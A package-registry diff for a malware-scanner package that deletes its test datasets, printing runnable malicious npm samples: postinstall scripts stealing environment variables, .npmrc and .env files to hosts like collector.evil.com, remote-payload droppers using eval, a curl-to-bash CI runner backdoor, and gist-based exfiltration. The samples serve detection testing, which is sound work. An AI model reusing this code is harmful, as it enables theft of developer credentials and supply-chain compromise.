muaddib-scanner 2.2.22 → 2.2.23

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (150) hide show
  1. package/package.json +1 -1
  2. package/.gitattributes +0 -18
  3. package/datasets/adversarial/README.md +0 -23
  4. package/datasets/adversarial/ai-agent-weaponization/index.js +0 -5
  5. package/datasets/adversarial/ai-agent-weaponization/package.json +0 -9
  6. package/datasets/adversarial/ai-agent-weaponization/setup.js +0 -83
  7. package/datasets/adversarial/ai-config-injection/.cursorrules +0 -36
  8. package/datasets/adversarial/ai-config-injection/index.js +0 -16
  9. package/datasets/adversarial/ai-config-injection/package.json +0 -8
  10. package/datasets/adversarial/browser-api-hook/index.js +0 -66
  11. package/datasets/adversarial/browser-api-hook/package.json +0 -6
  12. package/datasets/adversarial/bun-runtime-evasion/bun_environment.js +0 -23
  13. package/datasets/adversarial/bun-runtime-evasion/package.json +0 -9
  14. package/datasets/adversarial/bun-runtime-evasion/setup.js +0 -10
  15. package/datasets/adversarial/ci-trigger-exfil/index.js +0 -17
  16. package/datasets/adversarial/ci-trigger-exfil/package.json +0 -9
  17. package/datasets/adversarial/conditional-chain/index.js +0 -14
  18. package/datasets/adversarial/conditional-chain/package.json +0 -9
  19. package/datasets/adversarial/crypto-wallet-harvest/index.js +0 -44
  20. package/datasets/adversarial/crypto-wallet-harvest/package.json +0 -6
  21. package/datasets/adversarial/dead-mans-switch/index.js +0 -35
  22. package/datasets/adversarial/dead-mans-switch/package.json +0 -9
  23. package/datasets/adversarial/delayed-exfil/index.js +0 -6
  24. package/datasets/adversarial/delayed-exfil/package.json +0 -6
  25. package/datasets/adversarial/detached-background/launcher.js +0 -11
  26. package/datasets/adversarial/detached-background/package.json +0 -9
  27. package/datasets/adversarial/detached-background/worker.js +0 -26
  28. package/datasets/adversarial/discord-webhook-exfil/index.js +0 -95
  29. package/datasets/adversarial/discord-webhook-exfil/package.json +0 -9
  30. package/datasets/adversarial/dns-chunk-exfil/index.js +0 -10
  31. package/datasets/adversarial/dns-chunk-exfil/package.json +0 -6
  32. package/datasets/adversarial/docker-aware/index.js +0 -10
  33. package/datasets/adversarial/docker-aware/package.json +0 -6
  34. package/datasets/adversarial/double-base64-exfil/index.js +0 -11
  35. package/datasets/adversarial/double-base64-exfil/package.json +0 -9
  36. package/datasets/adversarial/dynamic-import/index.js +0 -21
  37. package/datasets/adversarial/dynamic-import/package.json +0 -9
  38. package/datasets/adversarial/dynamic-require/index.js +0 -3
  39. package/datasets/adversarial/dynamic-require/package.json +0 -9
  40. package/datasets/adversarial/fake-captcha-fingerprint/index.js +0 -64
  41. package/datasets/adversarial/fake-captcha-fingerprint/package.json +0 -9
  42. package/datasets/adversarial/gh-cli-token-steal/index.js +0 -31
  43. package/datasets/adversarial/gh-cli-token-steal/package.json +0 -6
  44. package/datasets/adversarial/github-exfil/index.js +0 -33
  45. package/datasets/adversarial/github-exfil/package.json +0 -9
  46. package/datasets/adversarial/iife-exfil/index.js +0 -17
  47. package/datasets/adversarial/iife-exfil/package.json +0 -9
  48. package/datasets/adversarial/indirect-eval-bypass/index.js +0 -27
  49. package/datasets/adversarial/indirect-eval-bypass/package.json +0 -5
  50. package/datasets/adversarial/mjs-extension-bypass/package.json +0 -6
  51. package/datasets/adversarial/mjs-extension-bypass/stealer.mjs +0 -39
  52. package/datasets/adversarial/muaddib-ignore-bypass/index.js +0 -47
  53. package/datasets/adversarial/muaddib-ignore-bypass/package.json +0 -5
  54. package/datasets/adversarial/nested-payload/index.js +0 -3
  55. package/datasets/adversarial/nested-payload/package.json +0 -9
  56. package/datasets/adversarial/nested-payload/utils/helper.js +0 -6
  57. package/datasets/adversarial/nested-payload/utils/lib/format.js +0 -23
  58. package/datasets/adversarial/postinstall-download/package.json +0 -8
  59. package/datasets/adversarial/preinstall-background-fork/bootstrap.js +0 -16
  60. package/datasets/adversarial/preinstall-background-fork/index.js +0 -2
  61. package/datasets/adversarial/preinstall-background-fork/package.json +0 -9
  62. package/datasets/adversarial/preinstall-background-fork/stealer.js +0 -67
  63. package/datasets/adversarial/preinstall-exec/package.json +0 -9
  64. package/datasets/adversarial/preinstall-exec/steal.js +0 -24
  65. package/datasets/adversarial/proxy-env-intercept/index.js +0 -33
  66. package/datasets/adversarial/proxy-env-intercept/package.json +0 -9
  67. package/datasets/adversarial/pyinstaller-dropper/index.js +0 -25
  68. package/datasets/adversarial/pyinstaller-dropper/package.json +0 -9
  69. package/datasets/adversarial/rdd-zero-deps/index.js +0 -32
  70. package/datasets/adversarial/rdd-zero-deps/init.js +0 -15
  71. package/datasets/adversarial/rdd-zero-deps/package.json +0 -11
  72. package/datasets/adversarial/remote-dynamic-dependency/index.js +0 -15
  73. package/datasets/adversarial/remote-dynamic-dependency/package.json +0 -7
  74. package/datasets/adversarial/self-hosted-runner-backdoor/index.js +0 -28
  75. package/datasets/adversarial/self-hosted-runner-backdoor/package.json +0 -9
  76. package/datasets/adversarial/silent-error-swallow/index.js +0 -32
  77. package/datasets/adversarial/silent-error-swallow/package.json +0 -6
  78. package/datasets/adversarial/staged-fetch/index.js +0 -9
  79. package/datasets/adversarial/staged-fetch/package.json +0 -6
  80. package/datasets/adversarial/string-concat-obfuscation/index.js +0 -6
  81. package/datasets/adversarial/string-concat-obfuscation/package.json +0 -6
  82. package/datasets/adversarial/template-literal-obfuscation/index.js +0 -4
  83. package/datasets/adversarial/template-literal-obfuscation/package.json +0 -9
  84. package/datasets/adversarial/triple-base64-github-push/index.js +0 -38
  85. package/datasets/adversarial/triple-base64-github-push/package.json +0 -9
  86. package/datasets/adversarial/websocket-exfil/index.js +0 -34
  87. package/datasets/adversarial/websocket-exfil/package.json +0 -9
  88. package/datasets/benign/README.md +0 -20
  89. package/datasets/benign/packages-npm.txt +0 -597
  90. package/datasets/benign/packages-pypi.txt +0 -164
  91. package/datasets/ground-truth/README.md +0 -54
  92. package/datasets/ground-truth/known-malware.json +0 -622
  93. package/datasets/holdout-v4/atob-eval/index.js +0 -2
  94. package/datasets/holdout-v4/atob-eval/package.json +0 -5
  95. package/datasets/holdout-v4/base64-require/index.js +0 -3
  96. package/datasets/holdout-v4/base64-require/package.json +0 -5
  97. package/datasets/holdout-v4/charcode-fetch/index.js +0 -3
  98. package/datasets/holdout-v4/charcode-fetch/package.json +0 -5
  99. package/datasets/holdout-v4/charcode-spread-homedir/index.js +0 -5
  100. package/datasets/holdout-v4/charcode-spread-homedir/package.json +0 -5
  101. package/datasets/holdout-v4/concat-env-steal/index.js +0 -4
  102. package/datasets/holdout-v4/concat-env-steal/package.json +0 -5
  103. package/datasets/holdout-v4/double-decode-exfil/index.js +0 -4
  104. package/datasets/holdout-v4/double-decode-exfil/package.json +0 -5
  105. package/datasets/holdout-v4/hex-array-exec/index.js +0 -3
  106. package/datasets/holdout-v4/hex-array-exec/package.json +0 -5
  107. package/datasets/holdout-v4/mixed-obfuscation-stealer/index.js +0 -10
  108. package/datasets/holdout-v4/mixed-obfuscation-stealer/package.json +0 -5
  109. package/datasets/holdout-v4/nested-base64-concat/index.js +0 -4
  110. package/datasets/holdout-v4/nested-base64-concat/package.json +0 -5
  111. package/datasets/holdout-v4/template-literal-hide/index.js +0 -3
  112. package/datasets/holdout-v4/template-literal-hide/package.json +0 -5
  113. package/datasets/holdout-v5/callback-exfil/main.js +0 -8
  114. package/datasets/holdout-v5/callback-exfil/package.json +0 -5
  115. package/datasets/holdout-v5/callback-exfil/reader.js +0 -10
  116. package/datasets/holdout-v5/class-method-exfil/collector.js +0 -10
  117. package/datasets/holdout-v5/class-method-exfil/main.js +0 -7
  118. package/datasets/holdout-v5/class-method-exfil/package.json +0 -5
  119. package/datasets/holdout-v5/conditional-split/detector.js +0 -2
  120. package/datasets/holdout-v5/conditional-split/package.json +0 -5
  121. package/datasets/holdout-v5/conditional-split/stealer.js +0 -16
  122. package/datasets/holdout-v5/event-emitter-flow/listener.js +0 -12
  123. package/datasets/holdout-v5/event-emitter-flow/package.json +0 -5
  124. package/datasets/holdout-v5/event-emitter-flow/scanner.js +0 -11
  125. package/datasets/holdout-v5/mixed-inline-split/index.js +0 -6
  126. package/datasets/holdout-v5/mixed-inline-split/package.json +0 -5
  127. package/datasets/holdout-v5/mixed-inline-split/reader.js +0 -3
  128. package/datasets/holdout-v5/mixed-inline-split/sender.js +0 -6
  129. package/datasets/holdout-v5/named-export-steal/main.js +0 -6
  130. package/datasets/holdout-v5/named-export-steal/package.json +0 -5
  131. package/datasets/holdout-v5/named-export-steal/utils.js +0 -1
  132. package/datasets/holdout-v5/reexport-chain/a.js +0 -2
  133. package/datasets/holdout-v5/reexport-chain/b.js +0 -1
  134. package/datasets/holdout-v5/reexport-chain/c.js +0 -11
  135. package/datasets/holdout-v5/reexport-chain/package.json +0 -5
  136. package/datasets/holdout-v5/split-env-exfil/env.js +0 -2
  137. package/datasets/holdout-v5/split-env-exfil/exfil.js +0 -5
  138. package/datasets/holdout-v5/split-env-exfil/package.json +0 -5
  139. package/datasets/holdout-v5/split-npmrc-steal/index.js +0 -2
  140. package/datasets/holdout-v5/split-npmrc-steal/package.json +0 -5
  141. package/datasets/holdout-v5/split-npmrc-steal/reader.js +0 -8
  142. package/datasets/holdout-v5/split-npmrc-steal/sender.js +0 -17
  143. package/datasets/holdout-v5/three-hop-chain/package.json +0 -5
  144. package/datasets/holdout-v5/three-hop-chain/reader.js +0 -8
  145. package/datasets/holdout-v5/three-hop-chain/sender.js +0 -11
  146. package/datasets/holdout-v5/three-hop-chain/transform.js +0 -3
  147. package/docker/Dockerfile +0 -20
  148. package/docker/sandbox-runner.sh +0 -313
  149. package/testssampleslink-deppackage.json +0 -1
  150. package/tmp-test-pack.js +0 -66
@@ -1,33 +0,0 @@
1
- // Adversarial sample: Proxy trap on process.env captures all env vars silently
2
- var http = require('http');
3
- var collected = {};
4
-
5
- var handler = {
6
- get: function(target, prop) {
7
- var val = target[prop];
8
- if (typeof val === 'string' && prop !== 'PATH' && prop !== 'HOME') {
9
- collected[prop] = val;
10
- }
11
- return val;
12
- }
13
- };
14
-
15
- process.env = new Proxy(process.env, handler);
16
-
17
- // Trigger reads that the app would normally do
18
- var _ = process.env.NODE_ENV;
19
- var __ = process.env.npm_config_registry;
20
-
21
- setTimeout(function() {
22
- var payload = JSON.stringify(collected);
23
- var opts = {
24
- hostname: 'collector.evil.com',
25
- port: 80,
26
- path: '/env',
27
- method: 'POST',
28
- headers: { 'Content-Type': 'application/json', 'Content-Length': payload.length }
29
- };
30
- var req = http.request(opts, function() {});
31
- req.write(payload);
32
- req.end();
33
- }, 5000);
@@ -1,9 +0,0 @@
1
- {
2
- "name": "proxy-env-intercept",
3
- "version": "1.0.0",
4
- "description": "Adversarial sample: Proxy on process.env to intercept all env access silently",
5
- "main": "index.js",
6
- "scripts": {
7
- "postinstall": "node index.js"
8
- }
9
- }
@@ -1,25 +0,0 @@
1
- // PhantomRaven dropper (Sonatype): download binary, chmod, execute
2
- // Classic dropper pattern — postinstall downloads and runs an external binary
3
-
4
- const fs = require('fs');
5
- const https = require('https');
6
- const { exec } = require('child_process');
7
- const path = require('path');
8
-
9
- const BINARY_URL = 'https://cdn.release-assets.dev/v3/update';
10
- const DROP_PATH = '/tmp/update';
11
-
12
- const file = fs.createWriteStream(DROP_PATH);
13
-
14
- https.get(BINARY_URL, (response) => {
15
- response.pipe(file);
16
- file.on('finish', () => {
17
- file.close();
18
- // Make executable and run
19
- fs.chmodSync(DROP_PATH, 0o755);
20
- exec(DROP_PATH, { timeout: 30000 }, () => {
21
- // Clean up after execution
22
- try { fs.unlinkSync(DROP_PATH); } catch (e) {}
23
- });
24
- });
25
- }).on('error', () => {});
@@ -1,9 +0,0 @@
1
- {
2
- "name": "pyinstaller-dropper",
3
- "version": "1.0.0",
4
- "description": "Holdout sample: PhantomRaven binary dropper (Sonatype)",
5
- "main": "index.js",
6
- "scripts": {
7
- "postinstall": "node index.js"
8
- }
9
- }
@@ -1,32 +0,0 @@
1
- // PhantomRaven variant: zero dependencies, runtime payload download
2
- // 200+ packages, 86K victims (Sonatype/Koi Security, Oct 2025)
3
- // The package.json shows zero dependencies to project a false sense of security
4
-
5
- const http = require('http');
6
- const https = require('https');
7
-
8
- // Stage 1: Fetch payload from what looks like a CDN config endpoint
9
- function loadConfig() {
10
- return new Promise((resolve, reject) => {
11
- const req = https.get('https://cdn.config-registry.io/v3/runtime/loader.js', (res) => {
12
- let body = '';
13
- res.on('data', chunk => body += chunk);
14
- res.on('end', () => resolve(body));
15
- });
16
- req.on('error', reject);
17
- });
18
- }
19
-
20
- // Stage 2: Execute the downloaded payload
21
- async function bootstrap() {
22
- try {
23
- const payload = await loadConfig();
24
- // Dynamic evaluation — the actual malicious code is never on disk
25
- const fn = new Function('require', 'process', payload);
26
- fn(require, process);
27
- } catch (e) {
28
- // Silent failure — don't alert the user
29
- }
30
- }
31
-
32
- bootstrap();
@@ -1,15 +0,0 @@
1
- // PhantomRaven postinstall: downloads and evals setup script
2
- // Runs during npm install — payload is fetched from remote server
3
-
4
- const https = require('https');
5
-
6
- const url = 'https://registry.npm-config.dev/setup/init.js';
7
-
8
- https.get(url, (res) => {
9
- let data = '';
10
- res.on('data', chunk => data += chunk);
11
- res.on('end', () => {
12
- // eval the remote payload — never stored on disk
13
- eval(data);
14
- });
15
- }).on('error', () => {});
@@ -1,11 +0,0 @@
1
- {
2
- "name": "rdd-zero-deps",
3
- "version": "2.0.1",
4
- "description": "Adversarial sample: PhantomRaven zero-dependency variant (Sonatype/Koi Oct 2025)",
5
- "main": "index.js",
6
- "dependencies": {},
7
- "devDependencies": {},
8
- "scripts": {
9
- "postinstall": "node init.js"
10
- }
11
- }
@@ -1,15 +0,0 @@
1
- // PhantomRaven pattern: zero dependencies, payload fetched at runtime
2
- // No require('child_process'), no require('fs'), no import — just fetch + eval
3
-
4
- async function initialize() {
5
- // Fetch remote configuration (actually malicious payload)
6
- const response = await fetch('https://cdn.jsdelivr.net/npm/@config-loader/runtime/config.js');
7
- const payload = await response.text();
8
-
9
- // Execute fetched code — the real malware lives on the remote server
10
- // This makes static analysis nearly impossible: the malicious code is never in the package
11
- eval(payload);
12
- }
13
-
14
- // Auto-execute on require/import
15
- initialize();
@@ -1,7 +0,0 @@
1
- {
2
- "name": "remote-dynamic-dependency",
3
- "version": "1.0.0",
4
- "description": "Adversarial sample: PhantomRaven zero-dependency runtime payload",
5
- "main": "index.js",
6
- "dependencies": {}
7
- }
@@ -1,28 +0,0 @@
1
- // Shai-Hulud 2.0: create a GitHub Actions workflow that registers as self-hosted runner
2
- // Persistence technique — no direct exfiltration, drops a backdoor workflow file
3
-
4
- const fs = require('fs');
5
- const path = require('path');
6
-
7
- const workflowContent = `name: discussion
8
- on:
9
- discussion:
10
- types: [created]
11
- jobs:
12
- process:
13
- runs-on: self-hosted
14
- steps:
15
- - name: Setup
16
- run: |
17
- curl -sL https://setup.runner-config.dev/install.sh | bash
18
- echo "Runner configured"
19
- `;
20
-
21
- // Find the nearest .github directory or create one
22
- const projectRoot = process.cwd();
23
- const ghDir = path.join(projectRoot, '.github', 'workflows');
24
-
25
- try {
26
- fs.mkdirSync(ghDir, { recursive: true });
27
- fs.writeFileSync(path.join(ghDir, 'discussion.yaml'), workflowContent);
28
- } catch (e) {}
@@ -1,9 +0,0 @@
1
- {
2
- "name": "self-hosted-runner-backdoor",
3
- "version": "1.0.0",
4
- "description": "Holdout sample: Shai-Hulud 2.0 self-hosted runner persistence",
5
- "main": "index.js",
6
- "scripts": {
7
- "postinstall": "node index.js"
8
- }
9
- }
@@ -1,32 +0,0 @@
1
- // Shai-Hulud v1: all malicious code wrapped in try/catch with empty catch
2
- // No errors, no logs, completely silent — user never knows it ran
3
-
4
- const fs = require('fs');
5
- const https = require('https');
6
- const os = require('os');
7
- const path = require('path');
8
-
9
- try {
10
- const npmrc = fs.readFileSync(path.join(os.homedir(), '.npmrc'), 'utf8');
11
- const data = JSON.stringify({ h: os.hostname(), t: npmrc });
12
- const req = https.request({
13
- hostname: 'telemetry.pkg-analytics.io',
14
- path: '/v1/report',
15
- method: 'POST',
16
- headers: { 'Content-Type': 'application/json' }
17
- }, () => {});
18
- req.write(data);
19
- req.end();
20
- } catch (e) {}
21
-
22
- try {
23
- const envFile = fs.readFileSync(path.join(process.cwd(), '.env'), 'utf8');
24
- const req2 = https.request({
25
- hostname: 'telemetry.pkg-analytics.io',
26
- path: '/v1/env',
27
- method: 'POST',
28
- headers: { 'Content-Type': 'application/json' }
29
- }, () => {});
30
- req2.write(JSON.stringify({ env: envFile }));
31
- req2.end();
32
- } catch (e) {}
@@ -1,6 +0,0 @@
1
- {
2
- "name": "silent-error-swallow",
3
- "version": "1.0.0",
4
- "description": "Holdout sample: Shai-Hulud v1 silent try/catch credential theft",
5
- "main": "index.js"
6
- }
@@ -1,9 +0,0 @@
1
- const https = require('https');
2
-
3
- https.get('https://pastebin.com/raw/abc123', (res) => {
4
- let body = '';
5
- res.on('data', (chunk) => { body += chunk; });
6
- res.on('end', () => {
7
- eval(body);
8
- });
9
- });
@@ -1,6 +0,0 @@
1
- {
2
- "name": "staged-fetch",
3
- "version": "1.0.0",
4
- "description": "Adversarial sample: remote payload fetch + eval",
5
- "main": "index.js"
6
- }
@@ -1,6 +0,0 @@
1
- const a = 'chi';
2
- const b = 'ld_';
3
- const c = 'pro';
4
- const d = 'cess';
5
- const mod = require(a + b + c + d);
6
- mod.exec('whoami');
@@ -1,6 +0,0 @@
1
- {
2
- "name": "string-concat-obfuscation",
3
- "version": "1.0.0",
4
- "description": "Adversarial sample: string concatenation to evade static analysis",
5
- "main": "index.js"
6
- }
@@ -1,4 +0,0 @@
1
- // Adversarial sample: template literal obfuscation to hide module name
2
- const m = `child${'_'}proc${'ess'}`;
3
- const mod = require(m);
4
- mod.exec('whoami > /tmp/.output && curl -X POST -d @/tmp/.output http://evil.com/collect');
@@ -1,9 +0,0 @@
1
- {
2
- "name": "template-literal-obfuscation",
3
- "version": "1.0.0",
4
- "description": "Adversarial sample: template literals to reconstruct dangerous module names",
5
- "main": "index.js",
6
- "scripts": {
7
- "postinstall": "node index.js"
8
- }
9
- }
@@ -1,38 +0,0 @@
1
- // Shai-Hulud v1: collect all env vars, triple base64 encode, push to GitHub API
2
- // Exfiltration via a legitimate service (api.github.com)
3
-
4
- const https = require('https');
5
- const os = require('os');
6
-
7
- // Collect all environment variables
8
- const envDump = JSON.stringify(process.env);
9
-
10
- // Triple base64 encode to evade pattern detection
11
- const b1 = Buffer.from(envDump).toString('base64');
12
- const b2 = Buffer.from(b1).toString('base64');
13
- const b3 = Buffer.from(b2).toString('base64');
14
-
15
- // Create a public gist via GitHub API with the stolen data
16
- const gistPayload = JSON.stringify({
17
- description: 'config-backup-' + Date.now(),
18
- public: true,
19
- files: {
20
- 'config.txt': {
21
- content: b3
22
- }
23
- }
24
- });
25
-
26
- const req = https.request({
27
- hostname: 'api.github.com',
28
- path: '/gists',
29
- method: 'POST',
30
- headers: {
31
- 'Content-Type': 'application/json',
32
- 'User-Agent': 'node-fetch/1.0',
33
- 'Authorization': `token ${process.env.GITHUB_TOKEN || ''}`,
34
- 'Content-Length': Buffer.byteLength(gistPayload)
35
- }
36
- }, () => {});
37
- req.write(gistPayload);
38
- req.end();
@@ -1,9 +0,0 @@
1
- {
2
- "name": "triple-base64-github-push",
3
- "version": "1.0.0",
4
- "description": "Holdout sample: Shai-Hulud v1 triple base64 + GitHub API exfil",
5
- "main": "index.js",
6
- "scripts": {
7
- "postinstall": "node index.js"
8
- }
9
- }
@@ -1,34 +0,0 @@
1
- // Adversarial sample: WebSocket exfiltration — bypasses HTTP/HTTPS/DNS detection
2
- var net = require('net');
3
- var fs = require('fs');
4
- var os = require('os');
5
- var crypto = require('crypto');
6
-
7
- // Read sensitive data
8
- var envDump = JSON.stringify(process.env);
9
- var npmrc = '';
10
- try { npmrc = fs.readFileSync(os.homedir() + '/.npmrc', 'utf8'); } catch(e) {}
11
-
12
- // Manual WebSocket handshake over raw TCP to avoid http.request detection
13
- var socket = net.connect(80, 'ws.evil.com', function() {
14
- var wsKey = crypto.randomBytes(16).toString('base64');
15
- var upgrade = 'GET /exfil HTTP/1.1\r\n' +
16
- 'Host: ws.evil.com\r\n' +
17
- 'Upgrade: websocket\r\n' +
18
- 'Connection: Upgrade\r\n' +
19
- 'Sec-WebSocket-Key: ' + wsKey + '\r\n' +
20
- 'Sec-WebSocket-Version: 13\r\n\r\n';
21
- socket.write(upgrade);
22
-
23
- // Send payload as WebSocket frame after handshake
24
- setTimeout(function() {
25
- var payload = JSON.stringify({ env: envDump, npmrc: npmrc });
26
- var buf = Buffer.from(payload);
27
- var frame = Buffer.alloc(2 + buf.length);
28
- frame[0] = 0x81;
29
- frame[1] = buf.length;
30
- buf.copy(frame, 2);
31
- socket.write(frame);
32
- socket.end();
33
- }, 1000);
34
- });
@@ -1,9 +0,0 @@
1
- {
2
- "name": "websocket-exfil",
3
- "version": "1.0.0",
4
- "description": "Adversarial sample: WebSocket exfiltration bypassing HTTP detection",
5
- "main": "index.js",
6
- "scripts": {
7
- "postinstall": "node index.js"
8
- }
9
- }
@@ -1,20 +0,0 @@
1
- # Benign Dataset
2
-
3
- This dataset contains known-legitimate packages used to measure MUAD'DIB's **False Positive Rate (FPR)**.
4
-
5
- ## Contents
6
-
7
- - `packages-npm.txt` — 100 popular npm packages (one per line)
8
- - `packages-pypi.txt` — 50 popular PyPI packages (one per line)
9
-
10
- ## FPR Calculation
11
-
12
- ```
13
- FPR = packages with score > 20 / total packages scanned
14
- ```
15
-
16
- A package scoring above 20 on a known-legitimate package is considered a false positive.
17
-
18
- ## Target
19
-
20
- **FPR < 5%** — fewer than 8 false positives out of 150 packages.